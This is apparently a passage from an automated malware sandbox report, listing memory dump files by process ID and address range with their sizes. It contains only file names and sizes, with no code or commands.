                                                                                                                                                                                                                                                                                              • memory/4672-1146-0x0000000000760000-0x0000000000DEE000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.6MB

                                                                                                                                                                                                                                                                                              • memory/4672-1008-0x0000000000760000-0x0000000000DEE000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.6MB

                                                                                                                                                                                                                                                                                              • memory/4736-366-0x0000000007250000-0x0000000007868000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.1MB

                                                                                                                                                                                                                                                                                              • memory/4736-368-0x0000000006CE0000-0x0000000006CF2000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                                                                              • memory/4736-354-0x0000000006C10000-0x0000000006C2E000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                                              • memory/4736-370-0x0000000006D40000-0x0000000006D7C000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                240KB

                                                                                                                                                                                                                                                                                              • memory/4736-258-0x0000000005D10000-0x00000000062B4000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                5.6MB

                                                                                                                                                                                                                                                                                              • memory/4736-519-0x0000000008490000-0x00000000089BC000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                5.2MB

                                                                                                                                                                                                                                                                                              • memory/4736-285-0x00000000059C0000-0x00000000059CA000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                              • memory/4736-336-0x0000000006440000-0x00000000064B6000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                                                                                              • memory/4736-367-0x0000000006DA0000-0x0000000006EAA000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                                              • memory/4736-262-0x0000000005800000-0x0000000005892000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                584KB

                                                                                                                                                                                                                                                                                              • memory/4736-452-0x0000000007A70000-0x0000000007AC0000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                320KB

                                                                                                                                                                                                                                                                                              • memory/4736-371-0x0000000006EB0000-0x0000000006EFC000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                                                                              • memory/4736-518-0x0000000007D90000-0x0000000007F52000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                                                              • memory/4736-237-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                328KB

                                                                                                                                                                                                                                                                                              • memory/4756-429-0x0000000005840000-0x00000000059D2000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                                                                              • memory/4756-252-0x00000000055A0000-0x000000000563C000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                624KB

                                                                                                                                                                                                                                                                                              • memory/4756-239-0x0000000000770000-0x0000000000CEE000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                5.5MB

                                                                                                                                                                                                                                                                                              • memory/4756-437-0x0000000005D10000-0x0000000005D20000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                                                              • memory/4876-412-0x0000000002E90000-0x0000000002E91000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4876-409-0x0000000001290000-0x0000000001291000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4876-417-0x00000000001A0000-0x0000000000D30000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                11.6MB

                                                                                                                                                                                                                                                                                              • memory/4876-416-0x0000000002EC0000-0x0000000002EC1000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4876-414-0x0000000002EB0000-0x0000000002EB1000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4876-413-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4876-411-0x00000000012C0000-0x00000000012C1000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4876-410-0x00000000012A0000-0x00000000012A1000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/5100-228-0x00007FF6C8F50000-0x00007FF6C9C24000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.8MB

                                                                                                                                                                                                                                                                                              • memory/5100-2-0x00007FFE81720000-0x00007FFE81722000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/5100-5-0x00007FFE7F060000-0x00007FFE7F062000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/5100-4-0x00007FFE80940000-0x00007FFE80942000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/5100-3-0x00007FFE80930000-0x00007FFE80932000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/5100-1480-0x00007FF6C8F50000-0x00007FF6C9C24000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.8MB

                                                                                                                                                                                                                                                                                              • memory/5100-1478-0x00007FF6C94A7000-0x00007FF6C967C000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                                                              • memory/5100-1-0x00007FFE81710000-0x00007FFE81712000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/5100-214-0x00007FF6C94A7000-0x00007FF6C967C000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                                                              • memory/5100-6-0x00007FFE7F070000-0x00007FFE7F072000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/5100-14-0x00007FF6C8F50000-0x00007FF6C9C24000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.8MB

                                                                                                                                                                                                                                                                                              • memory/5100-10-0x00007FF6C8F50000-0x00007FF6C9C24000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.8MB

                                                                                                                                                                                                                                                                                              • memory/5100-0-0x00007FF6C94A7000-0x00007FF6C967C000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                                                              • memory/5584-1382-0x0000000000710000-0x0000000000D7A000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.4MB

                                                                                                                                                                                                                                                                                              • memory/5584-1476-0x0000000000710000-0x0000000000D7A000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.4MB

                                                                                                                                                                                                                                                                                              • memory/6276-871-0x0000000000B70000-0x000000000103B000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4.8MB

                                                                                                                                                                                                                                                                                              • memory/6276-1005-0x0000000000B70000-0x000000000103B000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4.8MB

                                                                                                                                                                                                                                                                                              • memory/6480-1085-0x0000000005460000-0x00000000054AC000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                                                                              • memory/6480-1082-0x0000000004E00000-0x0000000005154000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                                                                                                              • memory/6924-1194-0x0000000000710000-0x0000000000D7A000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.4MB

                                                                                                                                                                                                                                                                                              • memory/6924-941-0x0000000000710000-0x0000000000D7A000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6.4MB

                                                                                                                                                                                                                                                                                              • memory/7088-1403-0x0000000004A30000-0x0000000004A7C000-memory.dmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                304KB